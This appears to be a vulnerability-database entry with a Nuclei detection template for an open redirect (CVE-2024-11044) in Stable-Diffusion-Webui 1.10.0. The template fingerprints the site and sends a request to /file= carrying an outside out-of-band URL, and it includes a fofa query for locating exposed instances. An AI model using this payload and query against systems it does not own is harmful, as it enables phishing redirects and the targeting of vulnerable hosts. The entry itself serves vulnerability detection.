An open redirect vulnerability exists in Stable-Diffusion-Webui 1.10.0, where the file parameter in the /file= endpoint can be manipulated to redirect users to malicious websites. This could facilitate phishing attacks by tricking users into visiting attacker-controlled URLs.
PoC代码[已公开]
id: CVE-2024-11044
info:
name: Stable Diffusion Webui 1.10.0 - Open Redirect
author: DhiyaneshDK
severity: medium
description: |
An open redirect vulnerability exists in Stable-Diffusion-Webui 1.10.0, where the file parameter in the /file= endpoint can be manipulated to redirect users to malicious websites. This could facilitate phishing attacks by tricking users into visiting attacker-controlled URLs.
reference:
- https://huntr.com/bounties/ee942e5e-4987-4f81-ba83-014fec6b33b3
classification:
epss-score: 0.00236
epss-percentile: 0.46566
metadata:
verified: true
max-request: 1
fofa-query: body="stable-diffusion-webui"
tags: cve,cve2024,huntr,redirect,oss,stable_diffusion_webui,automatic1111
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains_any(tolower(body), "stable-diffusion-webui", "k-diffusion", "content=\"stable diffusion")'
internal: true
- method: GET
path:
- "{{BaseURL}}/file=https://oast.pro"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
# digest: 4a0a0047304502202154e832f68f554949ddc8192919cf2b4aff7e238d858572fd5575b0c6a0c2d5022100b48cfdc3ef9893bdadcdd43110326823202c0e9e2a6db0dc01e17844c95df973:922c64590222798bb761d5b6d8e72950